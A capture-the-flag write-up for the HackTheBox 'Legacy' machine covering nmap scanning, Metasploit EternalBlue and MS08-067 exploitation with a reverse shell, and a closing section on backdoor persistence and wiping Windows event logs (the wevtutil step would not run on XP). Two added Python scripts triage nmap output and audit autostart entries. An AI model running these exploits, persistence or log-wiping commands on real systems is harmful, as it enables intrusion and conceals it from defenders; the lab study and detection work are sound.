HackTheBox Legacy

Author: Edwin | Shiro

Machine Synopsis

IP Address: 10.10.10.4

Key Exploitation Techniques:

  • SMB Vulnerability: Exploiting a critical remote code execution vulnerability in the SMBv1 protocol.
  • EternalBlue (MS17-010): Using the famous EternalBlue exploit to gain immediate SYSTEM access.
  • Alternative Vulnerabilities: Identifying and leveraging the MS08-067 vulnerability as a secondary exploitation path.

1. Enumeration

Initial reconnaissance with nmap revealed several open ports and a highly vulnerable SMB service.

nmap -p 139,445,3389 -sC -sV 10.10.10.4 -oN nmap_enum.txt

Nmap Results:

  • Ports 139 & 445 (SMB): The smb-os-discovery script identified the target as Windows XP, a very old and likely unpatched operating system.
  • Port 3389 (RDP): RDP is closed, meaning we cannot use it for initial access.

A more focused nmap vulnerability scan was performed to confirm the presence of known exploits.

nmap --script vuln -p 139,445 10.10.10.4 -oN nmap_vuln.txt

Nmap Vulnerability Scan Results:

  • smb-vuln-ms17-010: The system is vulnerable to EternalBlue, a remote code execution vulnerability affecting SMBv1. This is a high-risk finding.
  • smb-vuln-ms08-067: The system is also vulnerable to MS08-067 (Conficker), another critical SMB vulnerability.

Both vulnerabilities grant remote code execution and lead to a SYSTEM shell.
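The two scan files above are the evidence a defender would attach to a finding, so it helps to be able to triage them mechanically instead of reading them by eye. The following is an added example (not code from the writeup): it parses the script-results section of an nmap -oN file, lists every smb-vuln-* script that reported the host as VULNERABLE, and pairs each with the fix that closes it. The scan text embedded in the script is a constructed sample in the -oN layout, not the author's nmap_vuln.txt.

```python
"""Triage an nmap -oN file for SMB vulnerability findings.

Added example: parses nmap's normal output format and returns every
smb-vuln-* script that flagged the host as VULNERABLE, with remediation.
SAMPLE_NMAP_OUTPUT is a constructed sample, not a real scan file.
"""
import re

SAMPLE_NMAP_OUTPUT = """\
# Nmap scan initiated as: nmap --script vuln -p 139,445 10.10.10.4 -oN nmap_vuln.txt
Nmap scan report for 10.10.10.4
Host is up (0.045s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|_    Risk factor: HIGH
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|_    Risk factor: HIGH
"""

# What a defender would ticket for each script that fires.
REMEDIATION = {
    "smb-vuln-ms17-010": "Install MS17-010 and disable SMBv1; block 445/tcp from untrusted networks",
    "smb-vuln-ms08-067": "Install MS08-067 (Server service RCE); isolate the host until patched",
}

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
# Script-name line: '| name: ...' or '|_name: ...'. Body lines have more
# leading spaces after the bar and therefore do not match.
SCRIPT_RE = re.compile(r"^\|[_ ]?([A-Za-z0-9-]+):\s*(.*)$")
STATE_RE = re.compile(r"State:\s*((?:LIKELY )?VULNERABLE)")


def parse_host_scripts(text):
    """Return {host: {script_name: [body lines]}} from nmap -oN text."""
    results = {}
    host = None
    script = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            results[host] = {}
            script = None
            continue
        if host is None or not line.startswith("|"):
            script = None  # left a script block
            continue
        m = SCRIPT_RE.match(line)
        if m:
            script = m.group(1)
            results[host][script] = [m.group(2)] if m.group(2) else []
        elif script is not None:
            results[host][script].append(line.lstrip("|_ "))
    return results


def assess(results):
    """Return one finding per script whose body carries 'State: VULNERABLE'."""
    findings = []
    for host, scripts in results.items():
        for name, body in scripts.items():
            for entry in body:
                m = STATE_RE.search(entry)
                if m:
                    findings.append({
                        "host": host,
                        "script": name,
                        "state": m.group(1),
                        "remediation": REMEDIATION.get(name, "Review script output and apply the vendor patch"),
                    })
                    break
    return findings


def triage(text):
    """Parse an -oN file and return the list of vulnerable findings."""
    return assess(parse_host_scripts(text))


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_OUTPUT):
        print(f"{f['host']}  {f['script']:<20} {f['state']:<18} {f['remediation']}")
```

Run it against a real nmap_vuln.txt by reading the file into triage(); scripts that answered false or with an NT_STATUS error are parsed but produce no finding, which is the behaviour you want when the same file is fed back into a ticketing step.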


2. Exploitation: Gaining a SYSTEM Shell

Method 1: EternalBlue (MS17-010)

EternalBlue is the most direct exploit for this machine and the more recent of the two vulnerabilities. We used the Metasploit framework for a reliable and efficient attack.

First, we started msfconsole and selected the ms17_010_eternalblue exploit module.

msfconsole -q
msf6 > use exploit/windows/smb/ms17_010_eternalblue

Next, we configured the exploit with the target IP address and our local IP address to receive the reverse shell. The check command confirmed the target was vulnerable.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.4
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.3
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[+] 10.10.10.4:445       - Host is likely VULNERABLE to MS17-010! - Windows 5.1 x86 (32-bit)

Finally, we executed the exploit.

msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Sending stage (175174 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.4:1033)

The exploit successfully ran, and we were immediately granted a Meterpreter session with NT AUTHORITY\SYSTEM privileges, as confirmed by the getuid command.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Because the exploit runs its payload in the context of the SMB server, which itself runs as SYSTEM, no separate privilege escalation step was needed.


3. Flag Retrieval

With a SYSTEM shell, we located and retrieved both the user.txt and root.txt flags. The user.txt flag was on the john user’s desktop, and the root.txt flag was on the Administrator’s desktop.

C:\WINDOWS\system32> whoami
nt authority\system
C:\WINDOWS\system32> cd "C:\Documents and Settings\john\Desktop"
C:\Documents and Settings\john\Desktop> type user.txt
<redacted>
C:\Documents and Settings\john\Desktop> cd "C:\Documents and Settings\Administrator\Desktop"
C:\Documents and Settings\Administrator\Desktop> type root.txt
<redacted>

4. Alternative Exploitation Methods

  • MS08-067 (Conficker): The MS08-067 vulnerability is another viable path to a SYSTEM shell on this machine, and Metasploit has a module for it as well. The vulnerability predates EternalBlue and was used by the Conficker worm to spread.

    msf6 > use exploit/windows/smb/ms08_067_netapi
    msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
    msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.3
    msf6 exploit(windows/smb/ms08_067_netapi) > exploit
    
  • Manual Python Exploits: There are several Python implementations of the EternalBlue exploit available on GitHub that can be used instead of Metasploit. These scripts often require manual payload generation and rely on a netcat listener.


5. Post-Exploitation and Defense Evasion

After a successful compromise, a professional engagement requires establishing persistence and removing traces of the activity.

A. Persistence

  • Registry Key: Adding an entry to the Run registry key ensures a payload is executed on system startup.

    C:\WINDOWS\system32> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "C:\WINDOWS\system32\backdoor.exe"
    The operation completed successfully.
    
  • Service Installation: Creating a new service that starts automatically provides a robust persistence method.

    C:\WINDOWS\system32> sc create "SecurityUpdate" binpath= "C:\WINDOWS\system32\backdoor.exe" start= auto
    [SC] CreateService SUCCESS
    
  • Scheduled Task (Windows XP): The at command can be used to schedule a task to run at a specific time or on a recurring basis.

    C:\WINDOWS\system32> at 15:00 /every:M,T,W,Th,F,S,Su "C:\WINDOWS\system32\backdoor.exe"
    Added a new job with job ID = 1
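
Each of the three persistence mechanisms above leaves an entry in a location a responder can dump with one command: the Run key (reg query), the service configuration (sc qc) and the AT job list (a bare at). The following is an added example (not code from the writeup) that parses the text output of those three commands and diffs the autostart commands against a baseline of entries known to be legitimate on the build, reporting anything outside it. The three command outputs and the baseline are constructed samples; the formats follow the tools' column layouts, but field spacing differs between Windows versions, so the regexes tolerate any run of whitespace.

```python
"""Audit Windows autostart locations for the persistence mechanisms above.

Added example: parses reg query / sc qc / at output and reports every
autostart command that is not on the baseline. All inputs are constructed.
"""
import re

# Constructed output of: reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUN_KEY_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware Tools    REG_SZ    "C:\Program Files\VMware\VMware Tools\VMwareTray.exe"
    SecurityUpdate    REG_SZ    C:\WINDOWS\system32\backdoor.exe
"""

# Constructed output of: sc qc SecurityUpdate
SC_QC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SecurityUpdate
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\WINDOWS\system32\backdoor.exe
        DISPLAY_NAME       : SecurityUpdate
        SERVICE_START_NAME : LocalSystem
"""

# Constructed output of: at  (no arguments lists the scheduled jobs)
AT_OUTPUT = r"""
Status ID   Day                     Time          Command Line
-------------------------------------------------------------------------------
        1   Each M T W Th F S Su    3:00 PM       C:\WINDOWS\system32\backdoor.exe
"""

# Constructed baseline: autostart binaries expected on this build (lower-case, unquoted).
BASELINE = {
    r"c:\program files\vmware\vmware tools\vmwaretray.exe",
}

RUN_ENTRY_RE = re.compile(r"^\s+(.+?)\s+(REG_SZ|REG_EXPAND_SZ)\s+(.+)$")
SC_FIELD_RE = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*)$")
AT_JOB_RE = re.compile(r"^\s*(\d+)\s+(.+?)\s{2,}(\d{1,2}:\d{2} [AP]M)\s+(.+)$")


def parse_run_key(text):
    """Return [(value_name, command)] from reg query output."""
    return [(m.group(1), m.group(3)) for m in map(RUN_ENTRY_RE.match, text.splitlines()) if m]


def parse_sc_qc(text):
    """Return {field: value} from sc qc output (SERVICE_NAME, START_TYPE, BINARY_PATH_NAME, ...)."""
    fields = {}
    for line in text.splitlines():
        m = SC_FIELD_RE.match(line)
        if m:
            fields[m.group(1)] = m.group(2).strip()
    return fields


def parse_at_jobs(text):
    """Return [(job_id, schedule, command)] from the output of a bare 'at'."""
    return [(int(m.group(1)), m.group(2).strip(), m.group(4).strip())
            for m in map(AT_JOB_RE.match, text.splitlines()) if m]


def normalize(command):
    """Lower-case and strip surrounding quotes so quoting differences do not defeat the diff."""
    return command.strip().strip('"').lower()


def audit(run_entries, service, at_jobs, baseline=BASELINE):
    """Return [(location, detail)] for every autostart command outside the baseline."""
    findings = []
    for name, cmd in run_entries:
        if normalize(cmd) not in baseline:
            findings.append(("Run key", f"{name} -> {cmd}"))
    binary = service.get("BINARY_PATH_NAME", "")
    # Only auto-start services survive a reboot without help, so those are the ones to diff.
    if service.get("START_TYPE", "").endswith("AUTO_START") and normalize(binary) not in baseline:
        findings.append(("Service", f"{service.get('SERVICE_NAME', '?')} -> {binary}"))
    for job_id, schedule, cmd in at_jobs:
        if normalize(cmd) not in baseline:
            findings.append(("AT job", f"#{job_id} {schedule} -> {cmd}"))
    return findings


if __name__ == "__main__":
    for location, detail in audit(parse_run_key(RUN_KEY_OUTPUT),
                                  parse_sc_qc(SC_QC_OUTPUT),
                                  parse_at_jobs(AT_OUTPUT)):
        print(f"[{location}] {detail}")
```

The baseline comparison is deliberately exact on the normalized command, so an entry that adds arguments to a known binary is reported rather than silently accepted; build the baseline from a clean image of the same OS, not from the host under investigation.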
    

B. Defense Evasion

  • Log Cleanup: Clear the Windows event logs to remove evidence of the intrusion.

    C:\WINDOWS\system32> for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
    C:\WINDOWS\system32> del "C:\WINDOWS\system32\config\*.evt"
    
  • File Attribute Manipulation: Hide malicious files by changing their attributes to hidden and system.

    C:\WINDOWS\system32> attrib +h +s "C:\WINDOWS\system32\backdoor.exe"